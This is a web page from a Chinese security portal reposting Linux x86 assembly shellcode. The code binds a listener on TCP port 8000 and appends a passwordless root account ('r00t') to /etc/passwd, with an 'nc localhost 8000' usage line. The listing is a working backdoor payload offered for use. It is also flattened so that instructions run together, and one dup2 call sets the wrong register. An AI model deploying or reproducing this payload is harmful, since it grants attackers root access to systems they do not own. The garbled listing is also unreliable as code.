收藏本站 找回密码
开启辅助访问 OTP 注册 找回密码

为了顺应当前形势和更好的发展,黑基网已于9月19日正式更名为【安基网】,域名更换为www.safebase.cn,请卸载旧的APP并安装新的APP,给您带来不便,敬请理解!谢谢
黑基Web安全攻防班
安基网 首页 IT技术 安全攻防 查看内容

Bindport TCP/8000 & execve add user with access root

2009-6-9 09:35| 投稿: security

摘要:   ; Title: Bindport TCP/8000 & execve add user with access root  ; os: Linux x86  ; size: 225+ b...
  ; Title: Bindport TCP/8000 & execve add user with access root  ; os: Linux x86  ; size: 225+ bytes  ; IP: localhost  ; Port: 8000  ; Use: nc localhost 8000  ;  ; Author: Jonathan Salwan  ; Mail: submit AT shell-storm.org  ; Web: http://www.shell-storm.org  ;  ;  ; More shellcodes in => http://www.shell-storm.org/shellcode/  ;  section .text  global _start  _start:  ;;;;;;;;;;;;;;;;;;;;Socket();;;;;;;;;;;;;;;;;;;  pushbyte0x0  pushbyte0x1  pushbyte0x2  moveax, 0x66  movebx, 0x1  movecx, esp  int 0x80  ;;;;;;;;;;;;;;;;;;;;Socket();;;;;;;;;;;;;;;;;;;  mov edx, eax  ;;;;;;;;;;;;;;;;;;;;Bind();;;;;;;;;;;;;;;;;;;;;  pushbyte0x0  pushbyte0x0  pushbyte0x0  pushword0x401f  pushword0x2  movebx, esp  push byte0x10  pushebx  pushedx  moveax, 0x66  movebx, 0x2  movecx, esp  int 0x80  ;;;;;;;;;;;;;;;;;;;;Bind();;;;;;;;;;;;;;;;;;;;;  ;;;;;;;;;;;;;;;;;;;;Listen();;;;;;;;;;;;;;;;;;;  pushbyte0x1  pushedx  moveax,0x66  movebx,0x4  movecx, esp  int 0x80  ;;;;;;;;;;;;;;;;;;;;Listen();;;;;;;;;;;;;;;;;;;  ;;;;;;;;;;;;;;;;;;;;Accept();;;;;;;;;;;;;;;;;;;  pushbyte0x0  pushbyte0x0  pushedx  moveax, 0x66  movebx, 0x5  movecx, esp  int 0x80  ;;;;;;;;;;;;;;;;;;;;Accept();;;;;;;;;;;;;;;;;;;  movedx, eax  ;;;;;;;;;;;;;;;;;;;;Dup2();;;;;;;;;;;;;;;;;;;;;  moveax, 0x3f  movebx, edx  mov ebx, 0x2  int0x80  mov     eax, 0x3f  mov     ebx, edx  mov     ecx, 0x1  int       0x80  mov     eax, 0x3f  mov     ebx, edx  mov     ecx, 0x0  int       0x80  ;;;;;;;;;;;;;;;;;;;;Dup2();;;;;;;;;;;;;;;;;;;;;  ;;;;;;;;;;;;;;;;;;;;Open();;;;;;;;;;;;;;;;;;;;;  push byte 0x05  pop eax  xor ecx, ecx  push ecx  push 0x64777373  push 0x61702f2f  push 0x6374652f  mov ebx, esp  mov cx, 02001Q  int0x80  ;;;;;;;;;;;;;;;;;;;;Open();;;;;;;;;;;;;;;;;;;;;  mov ebx, eax  ;;;;;;;;;;;;;;;;;;;;Write();;;;;;;;;;;;;;;;;;;;  push byte 0x04  pop eax  xor edx, edx  push edx  pushword0x6873  push0x61622f6e  push0x69622f3a  push0x746f6f72  push0x2f3a746f  push0x6f723a30  push0x3a303a3a  push0x74303072  mov ecx, esp  push byte 0x1f  pop edx  int 0x80  ;;;;;;;;;;;;;;;;;;;;Write();;;;;;;;;;;;;;;;;;;;  ;;;;;;;;;;;;;;;;;;;;;Close();;;;;;;;;;;;;;;;;;;  push byte 0x06  pop eax  int 0x80  ;;;;;;;;;;;;;;;;;;;;;Close();;;;;;;;;;;;;;;;;;;  push byte 0x01  popeax  int 0x80

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。

鲜花
握手
雷人
路过
鸡蛋
收藏 邀请

相关阅读

最新评论

最新

HACKBASE
免责声明
关于我们
加入我们
广告及服务
广告合作
联系我们
友情链接
关注我们
官方微信
新浪微博
腾讯微博
合作伙伴
九州华胜
冰盾DDoS防火墙
威客众测
联系方式
电话:点击查看
QQ:3130399237
© 2003-2018 SAFEBASE.CN 京ICP备10030376号-6 【手机版】Powered by Discuz 本站由 百度云提供加速服务 存档
返回顶部